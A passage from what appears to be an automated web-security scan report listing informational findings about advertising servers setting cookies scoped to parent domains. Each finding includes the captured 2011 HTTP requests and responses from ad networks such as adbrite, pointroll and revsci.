Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.18. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.19. http://ads.adbrite.com/adserver/vdi/762701

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@3@4da052a5@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@4@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.20. http://ads.adbrite.com/adserver/vdi/779045

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.21. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 8673
Set-Cookie:PRID=337572AE-A012-4FFC-8DD1-6EAB82E26D53; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EoHuWaH2p;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJBaEoHuWaH2pAIJBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7BA00400-6896-A97D-0309-05A002090101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzpE:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzpEFy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

5.22. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=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; rtc_TdTG=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; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnXgmVDHz5HNAamBpCwgBedmjQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUPNOV2DdxIY1n3ioaH2BaM5+38g0fnq9IMs3Ssj976dqyMflzXndtQ/xCpjwkdl3jNjHIsSwidNVbPyQ8UukRlWAjzpgFu32Lh8TKovNuSMVT5zGqo+lVmsW02snStYmh6NVd6vQsWlMKLdx+mE2quPRxQw99QyHqQDKQmPTjX0IeU2BSj1d6aejeA2FSqM0oOtyZX/O2DScq9ciwmaexHpxuC3w/9hpURE0P7vbEXMP6qBRPf1ZS7Lkitm9khGEOewMOnllBWOlHOFGK43TM3FBJBRb/6qLcoC6gfW2xM4RivQvRRtikTJpufS1CInAw1no+zVmXZ2hTS6ONfIS1L7xA3elQ2eEN3P9aLspLwGIOLc4LwKaIjxEp7wbwhRcuvh+Onumpz1EcrdgPTf0xnSkxhfwzY2GYLXed45lhrR1joiovE7lKLUbTGz7+E1+YbvI8XZKmgeItShiLEr0yzF8A8nxh4PvIu9Cjo6s3qCFOY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:14 GMT
Content-Length: 1207

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

5.23. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid
...[SNIP]...

5.24. http://adx.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESENjWPLIPAv41DU05MuE90XA&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; uuid2=8663496762294337265; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^; path=/; expires=Sun, 10-Jul-2011 17:11:22 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 11 Apr 2011 17:11:22 GMT

GIF89a.............!.......,........@..L..;

5.25. http://ak1.abmr.net/is/content.yieldmanager.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/content.yieldmanager.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/content.yieldmanager.com?U=/ak/q.gif&V=3-lx%2fQOmxQNG0eorn%2fu8LBhvJeo45BnPB%2fik23iGVe80aLZrxSviggiGQ1thVyWCGj7JoWTuGQqRQ%3d&I=EEEA60E55DC1402&D=content.yieldmanager.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Cache-Control: max-age=0
If-Modified-Since: Wed, 18 Oct 2006 18:25:22 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D732F82572E67A35BA5BF05696140341DF83DF41237D012794F25B5156411B0E-3991BE1D4764374636ED9D1B940FEA8D6229E8AE7445C18E6AE4FBD599FB6EE4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://content.yieldmanager.com/ak/q.gif?01AD=2-2-7320F771B78BB912BBA6B43FD09A375AF470E07BBA7F6263FC7DF97235E71B2C-50EA0A74EF7A786FBF142F634336342D871099348D54D03CEE7EFC7E33D7483D&01RI=EEEA60E55DC1402&01NA=
Expires: Mon, 11 Apr 2011 16:51:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:51:19 GMT
Connection: close
Set-Cookie: 01AI=2-2-F7FF007DF9666A4675E172271ED2877EA801245906FC6F74799C0E1365DEE428-3B5BB0512DF04136FE1D7AF68802888AFF3B2F2871905733FA86994B3CC4A79D; expires=Tue, 10-Apr-2012 16:51:19 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


5.26. http://ak1.abmr.net/is/tag.admeld.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/iframe/3/foxnews/300x250/politics-bottom&V=3-jUOVCZARsyxH+dHMws+VqMAEIhqWEkm6k05w0XlzIC91Jfeb+K8e+Q%3d%3d&I=90A4C54ACA8290D&D=admeld.com&01AD=1&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EA49BC622C57E43014F7FE6EF1355413FADB8358BB4C363A4AF6797B5374FC5E-F664F3AE4E6B6C96B2174BDC101997813BE6B909145967C31BB3ED42B9E6829B

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3xkFoRwzZdHZJY48tpCxWZPLpmZ45zClagwxC5r36lze5klo7zuqbUg&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Expires: Mon, 11 Apr 2011 16:21:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
